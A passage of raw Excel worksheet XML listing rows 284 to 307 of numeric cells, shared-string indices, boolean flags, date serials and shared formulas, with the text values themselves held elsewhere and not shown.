      <c r="H284" s="4">
        <v>44357.29583333333</v>
      </c>
      <c r="I284" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J284" s="1" t="s">
        <v>1450</v>
      </c>
      <c r="K284" s="2" t="s">
        <v>1451</v>
      </c>
      <c r="L284" s="1">
        <v>7.0</v>
      </c>
      <c r="M284" s="1">
        <v>8.0</v>
      </c>
      <c r="N284" s="1" t="s">
        <v>564</v>
      </c>
      <c r="O284" s="1" t="s">
        <v>1452</v>
      </c>
      <c r="P284" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q284" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R284" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S284" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="1">
        <v>4091.0</v>
      </c>
      <c r="B285" s="2" t="s">
        <v>1456</v>
      </c>
      <c r="C285" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D285" s="2" t="s">
        <v>1457</v>
      </c>
      <c r="E285" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F285" s="1" t="s">
        <v>1458</v>
      </c>
      <c r="G285" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H285" s="4">
        <v>43530.614583333336</v>
      </c>
      <c r="I285" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J285" s="1" t="s">
        <v>1459</v>
      </c>
      <c r="K285" s="2" t="s">
        <v>1460</v>
      </c>
      <c r="L285" s="1">
        <v>3.0</v>
      </c>
      <c r="M285" s="1">
        <v>4.0</v>
      </c>
      <c r="N285" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O285" s="1" t="s">
        <v>1461</v>
      </c>
      <c r="P285" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q285" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R285" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S285" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="1">
        <v>4092.0</v>
      </c>
      <c r="B286" s="2" t="s">
        <v>1462</v>
      </c>
      <c r="C286" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D286" s="2" t="s">
        <v>1463</v>
      </c>
      <c r="E286" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F286" s="1" t="s">
        <v>1464</v>
      </c>
      <c r="G286" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H286" s="4">
        <v>43622.291666666664</v>
      </c>
      <c r="I286" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J286" s="1" t="s">
        <v>1459</v>
      </c>
      <c r="K286" s="2" t="s">
        <v>1460</v>
      </c>
      <c r="L286" s="1">
        <v>3.0</v>
      </c>
      <c r="M286" s="1">
        <v>4.0</v>
      </c>
      <c r="N286" s="1" t="s">
        <v>1465</v>
      </c>
      <c r="O286" s="1" t="s">
        <v>1461</v>
      </c>
      <c r="P286" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q286" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R286" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S286" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="1">
        <v>4093.0</v>
      </c>
      <c r="B287" s="2" t="s">
        <v>1466</v>
      </c>
      <c r="C287" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D287" s="2" t="s">
        <v>1467</v>
      </c>
      <c r="E287" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F287" s="1" t="s">
        <v>1458</v>
      </c>
      <c r="G287" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H287" s="4">
        <v>43652.816666666666</v>
      </c>
      <c r="I287" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J287" s="1" t="s">
        <v>1459</v>
      </c>
      <c r="K287" s="2" t="s">
        <v>1460</v>
      </c>
      <c r="L287" s="1">
        <v>3.0</v>
      </c>
      <c r="M287" s="1">
        <v>4.0</v>
      </c>
      <c r="N287" s="1" t="s">
        <v>1468</v>
      </c>
      <c r="O287" s="1" t="s">
        <v>1461</v>
      </c>
      <c r="P287" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q287" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R287" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S287" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="1">
        <v>4094.0</v>
      </c>
      <c r="B288" s="2" t="s">
        <v>1469</v>
      </c>
      <c r="C288" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D288" s="2" t="s">
        <v>1470</v>
      </c>
      <c r="E288" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F288" s="1" t="s">
        <v>1471</v>
      </c>
      <c r="G288" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H288" s="4">
        <v>43714.888194444444</v>
      </c>
      <c r="I288" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J288" s="1" t="s">
        <v>1459</v>
      </c>
      <c r="K288" s="2" t="s">
        <v>1460</v>
      </c>
      <c r="L288" s="1">
        <v>3.0</v>
      </c>
      <c r="M288" s="1">
        <v>4.0</v>
      </c>
      <c r="N288" s="1" t="s">
        <v>1472</v>
      </c>
      <c r="O288" s="1" t="s">
        <v>1461</v>
      </c>
      <c r="P288" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q288" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R288" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S288" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="1">
        <v>4095.0</v>
      </c>
      <c r="B289" s="2" t="s">
        <v>1456</v>
      </c>
      <c r="C289" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D289" s="2" t="s">
        <v>1457</v>
      </c>
      <c r="E289" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F289" s="1" t="s">
        <v>1458</v>
      </c>
      <c r="G289" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H289" s="4">
        <v>43530.61875</v>
      </c>
      <c r="I289" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J289" s="1" t="s">
        <v>1473</v>
      </c>
      <c r="K289" s="2" t="s">
        <v>1474</v>
      </c>
      <c r="L289" s="1">
        <v>2.0</v>
      </c>
      <c r="M289" s="1">
        <v>6.0</v>
      </c>
      <c r="N289" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O289" s="1" t="s">
        <v>1475</v>
      </c>
      <c r="P289" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q289" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R289" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S289" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="1">
        <v>4096.0</v>
      </c>
      <c r="B290" s="2" t="s">
        <v>1476</v>
      </c>
      <c r="C290" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D290" s="2" t="s">
        <v>1477</v>
      </c>
      <c r="E290" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F290" s="1" t="s">
        <v>1478</v>
      </c>
      <c r="G290" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H290" s="4">
        <v>43530.67847222222</v>
      </c>
      <c r="I290" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J290" s="1" t="s">
        <v>1473</v>
      </c>
      <c r="K290" s="2" t="s">
        <v>1474</v>
      </c>
      <c r="L290" s="1">
        <v>2.0</v>
      </c>
      <c r="M290" s="1">
        <v>6.0</v>
      </c>
      <c r="N290" s="1" t="s">
        <v>706</v>
      </c>
      <c r="O290" s="1" t="s">
        <v>1475</v>
      </c>
      <c r="P290" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q290" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R290" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S290" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="1">
        <v>4097.0</v>
      </c>
      <c r="B291" s="2" t="s">
        <v>1479</v>
      </c>
      <c r="C291" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D291" s="2" t="s">
        <v>1457</v>
      </c>
      <c r="E291" s="2" t="s">
        <v>1480</v>
      </c>
      <c r="F291" s="1" t="s">
        <v>1458</v>
      </c>
      <c r="G291" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H291" s="4">
        <v>43561.03125</v>
      </c>
      <c r="I291" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J291" s="1" t="s">
        <v>1473</v>
      </c>
      <c r="K291" s="2" t="s">
        <v>1474</v>
      </c>
      <c r="L291" s="1">
        <v>2.0</v>
      </c>
      <c r="M291" s="1">
        <v>6.0</v>
      </c>
      <c r="N291" s="1" t="s">
        <v>1481</v>
      </c>
      <c r="O291" s="1" t="s">
        <v>1475</v>
      </c>
      <c r="P291" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q291" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R291" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S291" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="1">
        <v>4098.0</v>
      </c>
      <c r="B292" s="2" t="s">
        <v>1482</v>
      </c>
      <c r="C292" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D292" s="2" t="s">
        <v>1483</v>
      </c>
      <c r="E292" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F292" s="1" t="s">
        <v>1478</v>
      </c>
      <c r="G292" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H292" s="4">
        <v>43561.041666666664</v>
      </c>
      <c r="I292" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J292" s="1" t="s">
        <v>1473</v>
      </c>
      <c r="K292" s="2" t="s">
        <v>1474</v>
      </c>
      <c r="L292" s="1">
        <v>2.0</v>
      </c>
      <c r="M292" s="1">
        <v>6.0</v>
      </c>
      <c r="N292" s="1" t="s">
        <v>104</v>
      </c>
      <c r="O292" s="1" t="s">
        <v>1475</v>
      </c>
      <c r="P292" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q292" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R292" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S292" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="1">
        <v>4099.0</v>
      </c>
      <c r="B293" s="2" t="s">
        <v>1484</v>
      </c>
      <c r="C293" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D293" s="2" t="s">
        <v>1485</v>
      </c>
      <c r="E293" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F293" s="1" t="s">
        <v>1458</v>
      </c>
      <c r="G293" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H293" s="4">
        <v>43714.720138888886</v>
      </c>
      <c r="I293" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J293" s="1" t="s">
        <v>1473</v>
      </c>
      <c r="K293" s="2" t="s">
        <v>1474</v>
      </c>
      <c r="L293" s="1">
        <v>2.0</v>
      </c>
      <c r="M293" s="1">
        <v>6.0</v>
      </c>
      <c r="N293" s="1" t="s">
        <v>1486</v>
      </c>
      <c r="O293" s="1" t="s">
        <v>1475</v>
      </c>
      <c r="P293" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q293" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R293" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S293" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="1">
        <v>4129.0</v>
      </c>
      <c r="B294" s="2" t="s">
        <v>1487</v>
      </c>
      <c r="C294" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D294" s="2" t="s">
        <v>1488</v>
      </c>
      <c r="E294" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F294" s="1" t="s">
        <v>1489</v>
      </c>
      <c r="G294" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H294" s="4">
        <v>44294.29791666667</v>
      </c>
      <c r="I294" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J294" s="1" t="s">
        <v>1490</v>
      </c>
      <c r="K294" s="2" t="s">
        <v>1491</v>
      </c>
      <c r="L294" s="1">
        <v>7.0</v>
      </c>
      <c r="M294" s="1">
        <v>12.0</v>
      </c>
      <c r="N294" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O294" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="P294" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q294" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R294" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S294" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="1">
        <v>4131.0</v>
      </c>
      <c r="B295" s="2" t="s">
        <v>1493</v>
      </c>
      <c r="C295" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D295" s="2" t="s">
        <v>1494</v>
      </c>
      <c r="E295" s="2" t="s">
        <v>1495</v>
      </c>
      <c r="F295" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="G295" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H295" s="4">
        <v>44294.365277777775</v>
      </c>
      <c r="I295" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J295" s="1" t="s">
        <v>1490</v>
      </c>
      <c r="K295" s="2" t="s">
        <v>1491</v>
      </c>
      <c r="L295" s="1">
        <v>7.0</v>
      </c>
      <c r="M295" s="1">
        <v>12.0</v>
      </c>
      <c r="N295" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="O295" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="P295" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q295" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R295" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S295" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="1">
        <v>4132.0</v>
      </c>
      <c r="B296" s="2" t="s">
        <v>1498</v>
      </c>
      <c r="C296" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D296" s="2" t="s">
        <v>1494</v>
      </c>
      <c r="E296" s="2" t="s">
        <v>1495</v>
      </c>
      <c r="F296" s="1" t="s">
        <v>1499</v>
      </c>
      <c r="G296" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H296" s="4">
        <v>44294.50486111111</v>
      </c>
      <c r="I296" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J296" s="1" t="s">
        <v>1490</v>
      </c>
      <c r="K296" s="2" t="s">
        <v>1491</v>
      </c>
      <c r="L296" s="1">
        <v>7.0</v>
      </c>
      <c r="M296" s="1">
        <v>12.0</v>
      </c>
      <c r="N296" s="1" t="s">
        <v>1500</v>
      </c>
      <c r="O296" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="P296" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q296" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R296" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S296" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="1">
        <v>4138.0</v>
      </c>
      <c r="B297" s="2" t="s">
        <v>1501</v>
      </c>
      <c r="C297" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D297" s="2" t="s">
        <v>1494</v>
      </c>
      <c r="E297" s="2" t="s">
        <v>1495</v>
      </c>
      <c r="F297" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G297" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H297" s="4">
        <v>44385.36666666667</v>
      </c>
      <c r="I297" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J297" s="1" t="s">
        <v>1490</v>
      </c>
      <c r="K297" s="2" t="s">
        <v>1491</v>
      </c>
      <c r="L297" s="1">
        <v>7.0</v>
      </c>
      <c r="M297" s="1">
        <v>12.0</v>
      </c>
      <c r="N297" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="O297" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="P297" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q297" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R297" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S297" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="1">
        <v>4148.0</v>
      </c>
      <c r="B298" s="2" t="s">
        <v>1503</v>
      </c>
      <c r="C298" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D298" s="2" t="s">
        <v>1504</v>
      </c>
      <c r="E298" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F298" s="1" t="s">
        <v>1505</v>
      </c>
      <c r="G298" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H298" s="1" t="s">
        <v>1506</v>
      </c>
      <c r="I298" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J298" s="1" t="s">
        <v>1507</v>
      </c>
      <c r="K298" s="2" t="s">
        <v>1508</v>
      </c>
      <c r="L298" s="1">
        <v>13.0</v>
      </c>
      <c r="M298" s="1">
        <v>14.0</v>
      </c>
      <c r="N298" s="1" t="s">
        <v>1509</v>
      </c>
      <c r="O298" s="1" t="s">
        <v>1510</v>
      </c>
      <c r="P298" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="Q298" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R298" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S298" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="1">
        <v>4155.0</v>
      </c>
      <c r="B299" s="2" t="s">
        <v>1511</v>
      </c>
      <c r="C299" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D299" s="2" t="s">
        <v>1512</v>
      </c>
      <c r="E299" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F299" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G299" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H299" s="4">
        <v>44353.69097222222</v>
      </c>
      <c r="I299" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J299" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="K299" s="2" t="s">
        <v>1514</v>
      </c>
      <c r="L299" s="1">
        <v>1.0</v>
      </c>
      <c r="M299" s="1">
        <v>1.0</v>
      </c>
      <c r="N299" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O299" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P299" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q299" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R299" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S299" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="1">
        <v>4423.0</v>
      </c>
      <c r="B300" s="2" t="s">
        <v>1515</v>
      </c>
      <c r="C300" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D300" s="2" t="s">
        <v>1516</v>
      </c>
      <c r="E300" s="2" t="s">
        <v>684</v>
      </c>
      <c r="F300" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="G300" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H300" s="1" t="s">
        <v>1518</v>
      </c>
      <c r="I300" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J300" s="1" t="s">
        <v>1519</v>
      </c>
      <c r="K300" s="2" t="s">
        <v>1520</v>
      </c>
      <c r="L300" s="1">
        <v>2.0</v>
      </c>
      <c r="M300" s="1">
        <v>2.0</v>
      </c>
      <c r="N300" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O300" s="1" t="s">
        <v>1521</v>
      </c>
      <c r="P300" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q300" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R300" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S300" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="1">
        <v>4496.0</v>
      </c>
      <c r="B301" s="2" t="s">
        <v>1522</v>
      </c>
      <c r="C301" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D301" s="2" t="s">
        <v>1523</v>
      </c>
      <c r="E301" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F301" s="1" t="s">
        <v>1524</v>
      </c>
      <c r="G301" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H301" s="1" t="s">
        <v>1525</v>
      </c>
      <c r="I301" s="1" t="s">
        <v>1526</v>
      </c>
      <c r="J301" s="1" t="s">
        <v>1527</v>
      </c>
      <c r="K301" s="2" t="s">
        <v>1528</v>
      </c>
      <c r="L301" s="1">
        <v>2.0</v>
      </c>
      <c r="M301" s="1">
        <v>2.0</v>
      </c>
      <c r="N301" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O301" s="1" t="s">
        <v>1529</v>
      </c>
      <c r="P301" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q301" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R301" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S301" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="1">
        <v>4497.0</v>
      </c>
      <c r="B302" s="2" t="s">
        <v>1530</v>
      </c>
      <c r="C302" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D302" s="2" t="s">
        <v>1523</v>
      </c>
      <c r="E302" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F302" s="1" t="s">
        <v>1524</v>
      </c>
      <c r="G302" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H302" s="1" t="s">
        <v>1525</v>
      </c>
      <c r="I302" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J302" s="1" t="s">
        <v>1531</v>
      </c>
      <c r="K302" s="2" t="s">
        <v>1528</v>
      </c>
      <c r="L302" s="1">
        <v>1.0</v>
      </c>
      <c r="M302" s="1">
        <v>1.0</v>
      </c>
      <c r="N302" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O302" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P302" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q302" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R302" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S302" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="1">
        <v>4498.0</v>
      </c>
      <c r="B303" s="2" t="s">
        <v>1530</v>
      </c>
      <c r="C303" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D303" s="2" t="s">
        <v>1523</v>
      </c>
      <c r="E303" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F303" s="1" t="s">
        <v>1524</v>
      </c>
      <c r="G303" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H303" s="1" t="s">
        <v>1525</v>
      </c>
      <c r="I303" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J303" s="1" t="s">
        <v>1532</v>
      </c>
      <c r="K303" s="2" t="s">
        <v>1528</v>
      </c>
      <c r="L303" s="1">
        <v>1.0</v>
      </c>
      <c r="M303" s="1">
        <v>1.0</v>
      </c>
      <c r="N303" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O303" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P303" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q303" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R303" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S303" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="1">
        <v>4499.0</v>
      </c>
      <c r="B304" s="2" t="s">
        <v>1533</v>
      </c>
      <c r="C304" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D304" s="2" t="s">
        <v>1534</v>
      </c>
      <c r="E304" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F304" s="1" t="s">
        <v>1535</v>
      </c>
      <c r="G304" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H304" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="I304" s="1" t="s">
        <v>1526</v>
      </c>
      <c r="J304" s="1" t="s">
        <v>1527</v>
      </c>
      <c r="K304" s="2" t="s">
        <v>1528</v>
      </c>
      <c r="L304" s="1">
        <v>2.0</v>
      </c>
      <c r="M304" s="1">
        <v>2.0</v>
      </c>
      <c r="N304" s="1" t="s">
        <v>1529</v>
      </c>
      <c r="O304" s="1" t="s">
        <v>1529</v>
      </c>
      <c r="P304" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q304" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R304" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S304" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="1">
        <v>4500.0</v>
      </c>
      <c r="B305" s="2" t="s">
        <v>1537</v>
      </c>
      <c r="C305" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D305" s="2" t="s">
        <v>1538</v>
      </c>
      <c r="E305" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F305" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G305" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H305" s="1" t="s">
        <v>1539</v>
      </c>
      <c r="I305" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J305" s="1" t="s">
        <v>1540</v>
      </c>
      <c r="K305" s="2" t="s">
        <v>1541</v>
      </c>
      <c r="L305" s="1">
        <v>6.0</v>
      </c>
      <c r="M305" s="1">
        <v>21.0</v>
      </c>
      <c r="N305" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O305" s="1" t="s">
        <v>1542</v>
      </c>
      <c r="P305" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q305" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R305" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S305" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="1">
        <v>4501.0</v>
      </c>
      <c r="B306" s="2" t="s">
        <v>1543</v>
      </c>
      <c r="C306" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D306" s="2" t="s">
        <v>1544</v>
      </c>
      <c r="E306" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F306" s="1" t="s">
        <v>1545</v>
      </c>
      <c r="G306" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H306" s="1" t="s">
        <v>1546</v>
      </c>
      <c r="I306" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J306" s="1" t="s">
        <v>1540</v>
      </c>
      <c r="K306" s="2" t="s">
        <v>1541</v>
      </c>
      <c r="L306" s="1">
        <v>6.0</v>
      </c>
      <c r="M306" s="1">
        <v>21.0</v>
      </c>
      <c r="N306" s="1" t="s">
        <v>1547</v>
      </c>
      <c r="O306" s="1" t="s">
        <v>1542</v>
      </c>
      <c r="P306" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q306" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R306" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S306" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="1">
        <v>4502.0</v>
      </c>
      <c r="B307" s="2" t="s">
        <v>1548</v>
      </c>
      <c r="C307" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D307" s="2" t="s">
        <v>1544</v>
      </c>
      <c r="E307" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F307" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G307" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H307" s="1" t="s">
        <v>1549</v>
      </c>
      <c r="I307" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J307" s="1" t="s">
        <v>1540</v>
      </c>
      <c r="K307" s="2" t="s">
        <v>1541</v>
      </c>
      <c r="L307" s="1">
        <v>6.0</v>
      </c>
      <c r="M307" s="1">
        <v>21.0</v>
      </c>
      <c r="N307" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O307" s="1" t="s">
        <v>1542</v>
      </c>
      <c r="P307" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q307" s="1">
